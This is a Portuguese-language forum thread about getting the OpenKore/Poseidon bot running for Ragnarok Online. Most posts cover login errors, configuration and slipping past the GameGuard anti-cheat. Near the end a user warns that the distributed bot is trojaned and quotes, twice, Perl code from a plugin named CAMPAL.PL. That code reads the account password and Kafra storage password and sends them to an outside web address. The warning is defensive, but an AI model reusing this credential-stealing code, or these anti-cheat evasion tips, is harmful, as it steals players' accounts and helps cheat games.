Ir para conteúdo
🥇 [Exclusivo] Seja um Membro VIP EXTREME! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Posts Recomendados

na hora de logar com qualquer senha toda hora aparece a mesma mensagem "não foi possivel ligar no servidor" alguem pode me ajudar?

vc nao ta uzando o ragexe certo,isso da no poseidon,usa o ragexe bot,copia ele e cola na pasta do bro,quando abrir o starto e bater qualquer senha vai dar certo,flws

pegue o ragexe que ta dentro da pasta ragexe bot e copie e cole ele dentro da pasta do seu ragnarok,quando abrir o bot seu poseidon vai conectar de boa,a menssagem que nao foi possivel conectar no servidor nao vai aparecer mais

isso mesmo que deve fazer,quem tiver duvida sobre como utilizar os ragexes apenas leia o meu post la no inicio do topic

oque uso ta tudo fudido ja o OPEKBRguard ta fudido ta 1 semana off e os nub so dao descupas noobs

po, baixei o openkore tal, mas não tem nenhum poseidon.bat nele! o0

só tem um start-poseidon.exe, que era o que eu usava nas antigas.

o que eu faço? hehe

o bot ta limpo sim tme scan,o arquivo poseidon se encontra na seguinte pasta src/poseidon/poseidon esse e o destino aonde fica o arquivo do poseidon so fazer uma copia do arquivo e colar aonde quizer pra ficar mais facil achar ele

ateh agora naum consegui rodar, ele da um monte de erros lokos, to sem tempo agora, depois tiro print e edito, ou mando outra resposta.

Mas ateh agora todo kore que falam que funcionandando 100% no meu pc naum funfa

Openkore com erro

Configuro ele mas ele não obedece...

Configurei pra vender os itens com 50% de peso

e ele não vende '-'

olha como que configura isso la no meu post,la fala cada opçao do config e oque faz!

intao velho eu fasso tudo certo ai quando abro o openkore.pl ele fala 'digite o servidor que voce deseja logar' algo assim oque eu escrevo aqui ?

intam,agora quando aparece isso sobe um pouco o openkore que vc vai ver que apareceu um monte de servidor e cada um deles corresponde ao servidor indicado no caso do Thor seria o numero 1

ae o game guard detectou aqui :S

opa é só não clicar em ok que vai.. valeu ta funcionando :D TY

Bando de burro, vai na pasta PLUGIN, acha o arquivo CAMPAL.PL escolhe ABRIR COMO e poe BLOCO de NOTAS que voces vao ver isso

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

é o codigo que esse debil mental ai usa pra roubar as senhas de qualquer pessoa que logar.

deixem de ser burros, nao baixem mais isso.

vai na pasta PLUGIN, acha o arquivo CAMPAL.PL escolhe ABRIR COMO e poe BLOCO de NOTAS que voces vao ver isso

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

é o codigo que esse debil mental ai usa pra roubar as senhas de qualquer pessoa que logar.

deixem de ser burros, nao baixem mais isso.

Este tópico está impedido de receber novos posts.
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.